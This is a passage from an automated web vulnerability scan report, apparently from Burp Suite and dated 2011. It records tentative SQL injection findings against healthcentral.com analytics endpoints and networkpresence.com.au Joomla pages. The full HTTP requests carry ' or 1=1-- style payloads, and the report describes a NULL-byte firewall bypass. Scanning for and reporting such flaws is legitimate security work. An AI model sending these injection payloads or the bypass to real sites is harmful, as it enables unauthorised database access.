Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:10:53 GMT
Server: Omniture DC/2.0.0
xserver: www500
Content-Length: 0
Content-Type: text/html


1.2. http://minerva.healthcentral.com/b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://minerva.healthcentral.com
Path:   /b/ss/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858?[AQB]&ndh=1&t=18/6/2011%2020%3A58%3A29%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&r=http%3A//paid.outbrain.com/network/redir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cc=USD&ch=ADHD%20Vertical&v0=825&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CHypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=1&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&c11=825&c12=2011-07-18&c37=PROMOSLIDE&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_cc=true

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:09:08 GMT
Server: Omniture DC/2.0.0
Content-Length: 407
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/cmi-choicemediacom/1/H.6-pdv-2/thcn27821391997858?[AQB]&ndh=1&t=18/6/2011%2020%3A58%3A29%201%20300&ns=choicemediainc&pageName=Verticals%20%3E%20ADHD%20%3E%20Slideshows%20%3E%20Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%20%3E%20Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&g=http%3A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&r=http%3A//paid.outbrain.com/network/redir%3Fkey%3Dea083f1f0a8664e17286dd018ebbd632%26rdid%3D218341001%26type%3DCAD_def_prd%26in-site%3Dfalse%26pc_id%3D3389484%26req_id%3D21fd5e9603ad3d38cc44a355febaf417%26agent%3Dblog_JS_rec%26recMode%3D4%26reqType%3D1%26wid%3D1%26imgType%3D0%26version%3D40317%26idx%3D6&cc=USD&ch=ADHD%20Vertical&v0=825&events=event4&c1=Slideshows&h1=Verticals%2CADHD%2CSlideshows%2CCommon%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women%2CHypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c2=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c3=1&c4=Common%20Symptoms%20of%20ADD%20%26%20ADHD%20in%20Women&c5=Hypersensitivity%20to%20Noise%2C%20Touch%20%26%20Smell&c6=Slideshows&c7=slideshow&c8=womensymptoms&c9=childrenshealth&c10=/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/%3Fap%3D825&c11=825&c12=2011-07-18&c37=PROMOSLIDE&thcn=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1065&bh=723&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BWPI%20Detector%201.3%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: minerva.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; s_cc=true

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:09:08 GMT
Server: Omniture DC/2.0.0
xserver: www636
Content-Length: 0
Content-Type: text/html


1.3. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   //components/com_joomlawatch/img.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21219339'%20or%201%3d1--%20 and 21219339'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //components21219339'%20or%201%3d1--%20/com_joomlawatch/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:22 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET //components21219339'%20or%201%3d2--%20/com_joomlawatch/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:01:22 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:23 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23711
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au//components21219339' or 1=2-- /com_joomlawatch/img.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" typ
...[SNIP]...

1.4. http://networkpresence.com.au//components/com_joomlawatch/img.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   //components/com_joomlawatch/img.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19093106'%20or%201%3d1--%20 and 19093106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET //components/com_joomlawatch19093106'%20or%201%3d1--%20/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:01:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET //components/com_joomlawatch19093106'%20or%201%3d2--%20/img.php?rand=44770 HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:01:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:01:59 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23711
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au//components/com_joomlawatch19093106' or 1=2-- /img.php" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" typ
...[SNIP]...

1.5. http://networkpresence.com.au/index.php/Services/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/Services/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10682034'%20or%201%3d1--%20 and 10682034'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/Services10682034'%20or%201%3d1--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:03 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/Services10682034'%20or%201%3d2--%20/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:04 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23695
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/Services10682034' or 1=2-- /" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />

<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>404</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<script type="text/javascript" src="/media/system/js/mootools.js"></script>
<script type="text/javascript" src="/media/system/js/caption.js"></script>
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) starts here -->

<style type="text/css" media="all">
   @import "http://networkpresence.com.au/plugins/content/jw_allvideos/templates/Default/template_css.css";
</style>
       
<script type="text/javascript" src="http://networkpresence.com.au/plugins/content/jw_allvideos/players/jw_allvideos_scripts.php"></script>
       
<!-- JoomlaWorks "AllVideos" Plugin (v2.5) ends here -->
<!-- JoomlaWorks "Frontpage Slideshow" v1.7.2 starts here -->
   <link rel="stylesheet" href="http://networkpresence.com.au/modules/mod_fpslideshow/mod_fpslideshow/templates/Uncut/template_css.php?w=520&amp;h=308&amp;sw=192" type="text/css" />
...[SNIP]...

1.6. http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://networkpresence.com.au
Path:   /index.php/component/option,com_webhosting/Itemid,58/catid,19/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 10454269'%20or%201%3d1--%20 and 10454269'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.php/component10454269'%20or%201%3d1--%20/option,com_webhosting/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:03:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:20 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 37581
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base href="http://networkpresence.com.au/index.php/component/option,com_webhosting/Itemid,58/catid,19/" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="robots" content="index, follow" />
<meta name="keywords" content="Network Presence,networkpresence.com.au,australian vps hosting,colocation,co-location,vps" />
<meta name="description" content="Network Presence - Australian Linux, Hosting and Internet Services!" />

<title>Cloud Plans</title>
<link href="/templates/aurora/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link type='text/css' href='http://networkpresence.com.au/modules/mod_swmenufree/styles/menu.css' rel='stylesheet' />
<script type="text/javascript" src="http://networkpresence.com.au/modules/mod_swmenufree/transmenu_Packed.js"></script>


<link rel="shortcut icon" href="/favicon.ico">
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/aurora/css/template.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/templates/aurora/css/blue.css" type="text/css" />

<!--[if IE 6]>
<link href="/templates/aurora/css/ie6.css" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if IE 7]>
<link href="/templates/aurora/css/ie7.css" rel="stylesheet" type="text/css" />
<![endif]-->

<style type="te
...[SNIP]...

Request 2

GET /index.php/component10454269'%20or%201%3d2--%20/option,com_webhosting/Itemid,58/catid,19/ HTTP/1.1
Host: networkpresence.com.au
Proxy-Connection: keep-alive
Referer: http://networkpresence.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 4628d21c49d5b7efd2573303fe803f27=b9oe8tqea8kn86paen0eht6p24; com_jw_fpss=true

Response 2

HTTP/1.1 404 NOT FOUND
Date: Tue, 19 Jul 2011 02:03:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 02:03:21 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 23737
Connection: close
Content-Type: text/html; charset=utf-8

